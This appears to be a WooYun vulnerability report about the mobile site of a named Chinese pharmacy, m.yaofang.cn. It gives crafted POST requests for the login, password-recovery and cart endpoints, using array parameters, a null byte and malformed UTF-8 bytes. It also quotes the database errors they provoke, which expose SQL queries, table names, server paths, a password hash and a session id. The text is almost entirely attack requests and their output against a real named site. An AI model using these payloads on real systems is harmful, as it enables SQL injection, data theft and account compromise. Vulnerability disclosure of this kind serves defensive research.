WooYun.org

URL:http://m.yaofang.cn/user/doLogin
POST:btnRegister=%E7%99%BB%E9%99%86&go=&logintype=0&password=bma123&username[]=493639943@@qq.com

A Database Error Occurred
Error Number: 1054
Unknown column 'Array' in 'where clause'
SELECT * FROM (`user`) WHERE `username` = Array AND `password` = '2da20caab7a8937b9a3bc85a079a193e'
Filename: /apache/htdocs/yfsite_wap/n/application/wap/models/usersmodel.php
Line Number: 97

URL:http://m.yaofang.cn/user/doRecoverpass 
POST:btnRegister=%e8%8e%b7%e5%8f%96%e6%96%b0%e5%af%86%e7%a0%81&email=sample%40email.tst&username[]=apbxgyxh

A Database Error Occurred
Error Number: 1054
Unknown column 'Array' in 'where clause'
SELECT * FROM (`user`) WHERE `username` = Array
Filename: /apache/htdocs/yfsite_wap/n/application/wap/models/usersmodel.php
Line Number: 32

URL:http://m.yaofang.cn//cart/add_Cart_info 
post:goods_id=1%00%c0%a7%c0%a2&r=0.9506772535387427

A Database Error Occurred
Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' , 0, ,'' ,'' , ,0 ,1 ,'' ,'' ,'' , ,42000 ,'2014-11-27 09:39:12',0,,0,0,'4166cd' at line 1
INSERT INTO ecs_cart (cur_integral, get_integral, user_id, goods_id, goods_sn, goods_name, market_price, goods_price, goods_number, product_unit, guige, company, is_real, shop_id, add_cart_time,flag,dealer_id,groupId,is_edit,session_id,fromId)VALUES(, , 0, ,'' ,'' , ,0 ,1 ,'' ,'' ,'' , ,42000 ,'2014-11-27 09:39:12',0,,0,0,'4166cd0c08d57efa204731985c313ab9',0);
Filename: /apache/htdocs/yfsite_wap/n/application/wap/models/cart_model.php
Line Number: 102